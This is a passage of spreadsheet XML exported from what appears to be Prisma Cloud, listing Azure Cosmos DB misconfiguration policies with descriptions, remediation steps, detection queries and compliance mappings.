      <c r="D2244" t="inlineStr"/>
      <c r="E2244" t="inlineStr"/>
      <c r="F2244" t="inlineStr"/>
      <c r="G2244" t="b">
        <v>1</v>
      </c>
      <c r="H22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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2244" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="K2244" t="inlineStr">
        <is>
          <t>Azure Cosmos DB Private Endpoint Connection is not configured</t>
        </is>
      </c>
      <c r="L2244" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2244" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2244" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2244" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2244" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2244" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2244" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2244" t="inlineStr"/>
      <c r="T2244" t="b">
        <v>0</v>
      </c>
      <c r="U2244" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2244" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="W2244" t="inlineStr">
        <is>
          <t>This policy identifies Cosmos DBs that are not configured with a private endpoint connection. Azure Cosmos DB private endpoints can be configured using Azure Private Link. Private Link allows users to access an Azure Cosmos account from within the virtual network or from any peered virtual network. When Private Link is combined with restricted NSG policies, it helps reduce the risk of data exfiltration. It is recommended to configure Private Endpoint Connection to Cosmos DB.</t>
        </is>
      </c>
      <c r="X2244" t="inlineStr">
        <is>
          <t>Refer to the following URL to configure Private endpoints on your Cosmos DB:
https://docs.microsoft.com/en-us/azure/cosmos-db/how-to-configure-private-endpoints</t>
        </is>
      </c>
      <c r="Y2244" t="inlineStr"/>
      <c r="Z2244" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cosmos-db' AND json.rule = properties.provisioningState equals Succeeded and properties.privateEndpointConnections[*] does not exist</t>
        </is>
      </c>
      <c r="AA2244" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2244" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2244" t="inlineStr">
        <is>
          <t>PC-AZR-COS-783</t>
        </is>
      </c>
      <c r="AD2244" t="b">
        <v>1</v>
      </c>
      <c r="AE2244" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2244" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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4" t="inlineStr">
        <is>
          <t>ea9d10f0-d8c2-4fde-9541-326a933c48b7</t>
        </is>
      </c>
      <c r="AI2244" t="inlineStr">
        <is>
          <t>bb3cf6db-4693-4650-a85c-b85c42098899</t>
        </is>
      </c>
      <c r="AJ2244" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2244" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2245">
      <c r="A2245" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v10.0 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, MITRE ATT&amp;CK v12, New Zealand Information Security Manual (NZISM v3.4), ACSC Information Security Manual (ISM), CIS Controls v8, Matt's ATT&amp;ACK, GDPR, Insurance Regulatory And Development Authority Of India, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, SOC 2, HIPAA, Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CIS Controls v8.1, Sarbanes Oxley Act (SOX), CIS Controls v7.1, Copy of New Zealand Information Security Manual (NZISM v3.4)</t>
        </is>
      </c>
      <c r="B2245" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2245" s="2" t="inlineStr"/>
      <c r="D2245" t="inlineStr"/>
      <c r="E2245" t="inlineStr"/>
      <c r="F2245" t="inlineStr"/>
      <c r="G2245" t="b">
        <v>1</v>
      </c>
      <c r="H22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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2245" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="K2245" t="inlineStr">
        <is>
          <t>Azure Cosmos DB Virtual network is not configured</t>
        </is>
      </c>
      <c r="L2245" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2245" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2245" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2245" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2245" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2245" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2245" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2245" t="inlineStr"/>
      <c r="T2245" t="b">
        <v>0</v>
      </c>
      <c r="U2245" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2245" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="W2245" t="inlineStr">
        <is>
          <t>This policy identifies Azure Cosmos DBs that are not configured with a Virtual network. Azure Cosmos DB by default is accessible from any source if the request is accompanied by a valid authorization token. By configuring Virtual network only requests originating from those subnets will get a valid response. It is recommended to configure Virtual network to Cosmos DB.</t>
        </is>
      </c>
      <c r="X2245" t="inlineStr">
        <is>
          <t>Refer to the following URL to configure Virtual networks on your Cosmos DB:
https://docs.microsoft.com/en-us/azure/cosmos-db/how-to-configure-vnet-service-endpoint</t>
        </is>
      </c>
      <c r="Y2245" t="inlineStr"/>
      <c r="Z2245" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cosmos-db' AND json.rule = properties.provisioningState equals Succeeded and properties.virtualNetworkRules[*] does not exist</t>
        </is>
      </c>
      <c r="AA2245" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2245" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2245" t="inlineStr">
        <is>
          <t>PC-AZR-COS-785</t>
        </is>
      </c>
      <c r="AD2245" t="b">
        <v>1</v>
      </c>
      <c r="AE2245" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2245" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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5" t="inlineStr">
        <is>
          <t>0f191e4f-ae38-49c4-8660-6a142a3f2721</t>
        </is>
      </c>
      <c r="AI2245" t="inlineStr">
        <is>
          <t>81bc5357-be35-4bd7-80e1-6ed14297cfc5</t>
        </is>
      </c>
      <c r="AJ2245" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2245" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2246">
      <c r="A2246" t="inlineStr">
        <is>
          <t>Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), kfirdaus AWS Account-CS, kfirdaus AWS Account-CS, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, HITRUST CSF v.11.2.0, TX-RAMP Level 2, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, CSA CCM v.4.0.6, CIS Controls v7.1, Sarbanes Oxley Act (SOX), ISO 27002:2022, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27001:2022, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, Copy of CIS Controls v8, Copy of New Zealand Information Security Manual (NZISM v3.4), RBI Baseline Cyber Security and Resilience Requirements, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2246" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2246" s="2" t="inlineStr"/>
      <c r="D2246" t="inlineStr"/>
      <c r="E2246" t="inlineStr"/>
      <c r="F2246" t="inlineStr"/>
      <c r="G2246" t="b">
        <v>1</v>
      </c>
      <c r="H22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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2246" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="K2246" t="inlineStr">
        <is>
          <t>Azure Cosmos DB allows traffic from public Azure datacenters</t>
        </is>
      </c>
      <c r="L2246" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2246" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2246" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2246" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2246" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2246" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2246" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2246" t="inlineStr"/>
      <c r="T2246" t="b">
        <v>0</v>
      </c>
      <c r="U2246" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2246" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="W2246" t="inlineStr">
        <is>
          <t>This policy identifies Cosmos DBs that allow traffic from public Azure datacenters. If you enable this option, the IP address 0.0.0.0 is added to the list of allowed IP addresses. The list of IPs allowed by this option is wide, so it limits the effectiveness of a firewall policy. So it is recommended not to select the ‘Accept connections from within public Azure datacenters’ option for your Cosmos DB.</t>
        </is>
      </c>
      <c r="X2246" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Go to Azure Cosmos DB service
3. Select the reported Azure Cosmos DB account
4. Click on 'Firewall and virtual networks' under 'Settings'
5. Unselect 'Accept connections from within public Azure datacenters' option under 'Exceptions'
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2246" t="inlineStr"/>
      <c r="Z2246" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cosmos-db' AND json.rule = properties.provisioningState equals Succeeded and properties.ipRangeFilter is not empty and properties.ipRangeFilter startsWith 0.0.0.0 or properties.ipRangeFilter endsWith 0.0.0.0</t>
        </is>
      </c>
      <c r="AA2246" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2246" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2246" t="inlineStr">
        <is>
          <t>PC-AZR-COS-792</t>
        </is>
      </c>
      <c r="AD2246" t="b">
        <v>1</v>
      </c>
      <c r="AE2246" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2246" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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6" t="inlineStr">
        <is>
          <t>a9c8a506-e061-45ec-8b37-080bf40c6e47</t>
        </is>
      </c>
      <c r="AI2246" t="inlineStr">
        <is>
          <t>d5cbf099-d1e5-4be3-87c6-7637538bf672</t>
        </is>
      </c>
      <c r="AJ2246" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2246" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2247">
      <c r="A2247" t="inlineStr"/>
      <c r="B2247" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2247" s="2" t="inlineStr"/>
      <c r="D2247" t="n">
        <v>4</v>
      </c>
      <c r="E2247" t="n">
        <v>3</v>
      </c>
      <c r="F2247" t="n">
        <v>0</v>
      </c>
      <c r="G2247" t="b">
        <v>1</v>
      </c>
      <c r="H22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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2247" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="K2247" t="inlineStr">
        <is>
          <t>Data breach risk due to an Azure Cosmos DB that is reachable from untrusted Internet sources having key based authentication enabled</t>
        </is>
      </c>
      <c r="L2247" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2247" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2247" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2247" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2247" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2247" t="inlineStr"/>
      <c r="R2247" t="inlineStr"/>
      <c r="S2247" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2247" t="b">
        <v>0</v>
      </c>
      <c r="U2247" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2247" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="W2247" t="inlineStr">
        <is>
          <t>This policy identifies Azure Cosmos DB instances with key based authentication enabled and reachable from untrust internet source.
Key based authentication to Cosmos DB would enable write access from client connecting using the account keys. It is recommended to disable this feature for organizations who want higher degrees of control and governance for production environments. Exposure of the DB instance to untrust internet source makes it an easy target for attack.
Immediate attention is required to restrict public exposure as soon as possible and disable key-based metadata write access on your Azure Cosmos DB.</t>
        </is>
      </c>
      <c r="X2247" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict access to Azure Cosmos DB instances from untrusted internet sources by configuring firewall rules
1. Sign in to the Azure Portal using your Azure account credentials
2. Navigate to the Azure Cosmos DB Dashboard
3. Identify the reported Azure Cosmos DB instances that you want to restrict public access
4. Navigate to the 'Networking' section
5. Under 'Public network access' select 'Selected networks'
6. Under the 'Firewall' section, add the IP addresses or IP address ranges of the trusted sources in CIDR form in 'IP (Single IPv4 or CIDR range)'
7. Click 'Save' to apply the changes
[MISCONFIGURATION]
Refer to the following URL to disable key-based metadata write access on your Azure Cosmos DB:
https://docs.microsoft.com/en-us/azure/cosmos-db/role-based-access-control#prevent-sdk-changes</t>
        </is>
      </c>
      <c r="Y2247" t="inlineStr"/>
      <c r="Z2247" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('azure-cosmos-db') and finding.name contains all ('Azure Cosmos DB (PaaS) instance with network path from the untrust internet source','Azure Cosmos DB key based authentication is enabled')</t>
        </is>
      </c>
      <c r="AA2247" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2247" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:32</t>
        </is>
      </c>
      <c r="AC2247" t="inlineStr"/>
      <c r="AD2247" t="b">
        <v>1</v>
      </c>
      <c r="AE2247" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2247" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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7" t="inlineStr">
        <is>
          <t>16fbc695-3ab5-49d6-8084-5f88e1b0ed88</t>
        </is>
      </c>
      <c r="AI2247" t="inlineStr">
        <is>
          <t>c03a8726-373b-41bc-b0f1-02efa5eec90a</t>
        </is>
      </c>
      <c r="AJ2247" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2247" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2248">
      <c r="A2248" t="inlineStr">
        <is>
          <t>Copy of ACSC Information Security Manual (ISM)-clone, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, PCI DSS v4.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS Controls v8, CSA CCM v4.0.12, MITRE ATT&amp;CK v10.0 [Deprecated], ACSC Information Security Manual (ISM), Copy of CIS Controls v8, MITRE ATT&amp;CK v12, Microsoft Cloud Security Benchmark v1, CIS v2.0.0 (Azure) Level 1, Matt's ATT&amp;ACK, CSA CCM v.4.0.6, TX-RAMP Level 1, PCI DSS v4.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CSA CCM v.4.0.6, FFIEC, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CIS v2.1.0 (Azure) Level 1, CSA CCM v.4.0.6, RBI Baseline Cyber Security and Resilience Requirements, Insurance Regulatory And Development Authority Of India, CIS Controls v7.1, PCI DSS v4.0, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), Australian Energy Sector Cyber Security Framework (AESCSF), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS Controls v7.1, Australian Cyber Security Centre (ACSC) Essential Eight, PCI DSS v4.0, TX-RAMP Level 1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, CIS Controls v8.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CSA CCM v4.0.12, Matt's ATT&amp;ACK, ITSG-33, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), ISO 27002:2022, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2022.2.1</t>
        </is>
      </c>
      <c r="B2248" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2248" s="2" t="inlineStr"/>
      <c r="D2248" t="inlineStr"/>
      <c r="E2248" t="inlineStr"/>
      <c r="F2248" t="inlineStr"/>
      <c r="G2248" t="b">
        <v>1</v>
      </c>
      <c r="H22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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2248" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="K2248" t="inlineStr">
        <is>
          <t>Azure Cosmos DB key based authentication is enabled</t>
        </is>
      </c>
      <c r="L2248" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2248" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2248" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2248" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2248" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2248" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2248" t="inlineStr">
        <is>
          <t>ISM-1603</t>
        </is>
      </c>
      <c r="S2248" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2248" t="b">
        <v>1</v>
      </c>
      <c r="U2248" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2248" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="W2248" t="inlineStr">
        <is>
          <t>This policy identifies Cosmos DBs that are enabled with key-based authentication. Disabling key-based metadata write access on Azure Cosmos DB prevents any changes to resources from a client connecting using the account keys. It is recommended to disable this feature for organizations who want higher degrees of control and governance for production environments.
NOTE: Enabling this feature can have an impact on your application. Make sure that you understand the impact before enabling it.
Refer for more details:
https://docs.microsoft.com/en-us/azure/cosmos-db/role-based-access-control#check-list-before-enabling</t>
        </is>
      </c>
      <c r="X2248" t="inlineStr">
        <is>
          <t>Refer to the following URL to disable key-based metadata write access on your Azure Cosmos DB:
https://docs.microsoft.com/en-us/azure/cosmos-db/role-based-access-control#prevent-sdk-changes 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-4
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-4</t>
        </is>
      </c>
      <c r="Y2248" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.DocumentDB/databaseAccounts/write' permission. Successful execution will disable key based metadata write access on your cosmosdb.",
'impact': 'Disables key based metadata write access on Cosmosdb',
'cliScriptTemplate': 'az cosmosdb update --name $resourceName --resource-group $resourceGroup --disable-key-based-metadata-write-access true'</t>
        </is>
      </c>
      <c r="Z2248" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cosmos-db' AND json.rule = properties.provisioningState equals Succeeded and properties.disableKeyBasedMetadataWriteAccess is false
{"category":"Storage","resourceTypes":["azurerm_cosmosdb_account"]}</t>
        </is>
      </c>
      <c r="AA2248" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2248" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2248" t="inlineStr">
        <is>
          <t>PC-AZR-COS-784-CKV_AZURE_132</t>
        </is>
      </c>
      <c r="AD2248" t="b">
        <v>1</v>
      </c>
      <c r="AE2248" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2248" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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8" t="inlineStr">
        <is>
          <t>8fc7b6c0-d6c2-4f29-ad98-d837e7a74ec7</t>
        </is>
      </c>
      <c r="AI2248" t="inlineStr">
        <is>
          <t>ef14d0a6-8ed0-4f7a-9877-15efa3194737</t>
        </is>
      </c>
      <c r="AJ2248" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2248" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2249">
      <c r="A2249" t="inlineStr">
        <is>
          <t>CSA CCM v.4.0.1, MLPS 2.0 (Level 2), CIS Controls v8, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, CIS v2.1.0 (Azure) Level 2, NIST SP 800-172, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27001:2022, ISO/IEC 27001:2022, ISO/IEC 27002:2013, PCI DSS v4.0, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), PCI DSS v4.0, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CIS Controls v8.1, kashan ACSC Information Security Manual (ISM), PCI DSS v3.2.1, ISO 27002:2022, CSA CCM v.4.0.1, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, CIS Controls v7.1, CIS v2.0.0 (Azure) Level 2, Copy of New Zealand Information Security Manual (NZISM v3.4), kfirdaus AWS Account-CS, NIST CSF, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Copy of CIS Controls v8, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v.4.0.1, NIST SP 800-172</t>
        </is>
      </c>
      <c r="B2249" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2249" s="2" t="inlineStr"/>
      <c r="D2249" t="inlineStr"/>
      <c r="E2249" t="inlineStr"/>
      <c r="F2249" t="inlineStr"/>
      <c r="G2249" t="b">
        <v>1</v>
      </c>
      <c r="H22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49" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2249" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="K2249" t="inlineStr">
        <is>
          <t>Azure Cosmos DB IP range filter not configured</t>
        </is>
      </c>
      <c r="L2249" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2249" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2249" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2249" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2249" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2249" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2249" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S2249" t="inlineStr"/>
      <c r="T2249" t="b">
        <v>0</v>
      </c>
      <c r="U2249" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2249" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="W2249" t="inlineStr">
        <is>
          <t>This policy identifies Azure Cosmos DB with IP range filter not configured. Azure Cosmos DB should be restricted access from All Networks. It is recommended to add defined set of IP / IP range which can access Azure Cosmos DB from the Internet.</t>
        </is>
      </c>
      <c r="X2249" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Go to Azure Cosmos DB
3. Select the reported Cosmos DB resource 
4. Click on 'Firewall and virtual networks' under 'Settings'
5. Click on 'Selected networks' radio button
6. Under 'Firewall' add IP ranges
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2249" t="inlineStr"/>
      <c r="Z2249" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cosmos-db' AND json.rule = properties.ipRangeFilter is empty</t>
        </is>
      </c>
      <c r="AA2249" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2249" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2249" t="inlineStr">
        <is>
          <t>PC-AZR-COS-560</t>
        </is>
      </c>
      <c r="AD2249" t="b">
        <v>1</v>
      </c>
      <c r="AE2249" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2249" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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49" t="inlineStr">
        <is>
          <t>7ebe7135-63e8-437d-9c83-7e7d0d73f415</t>
        </is>
      </c>
      <c r="AI2249" t="inlineStr">
        <is>
          <t>b721b2eb-1de0-47e8-9a5b-9ec5bb0516de</t>
        </is>
      </c>
      <c r="AJ2249" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2249" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2250">
      <c r="A2250" t="inlineStr">
        <is>
          <t>NIST SP 800-171 Revision 3, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2022.2.1, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, Sarbanes Oxley Act (SOX), Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), ITSG-33, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2250" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2250" s="2" t="inlineStr"/>
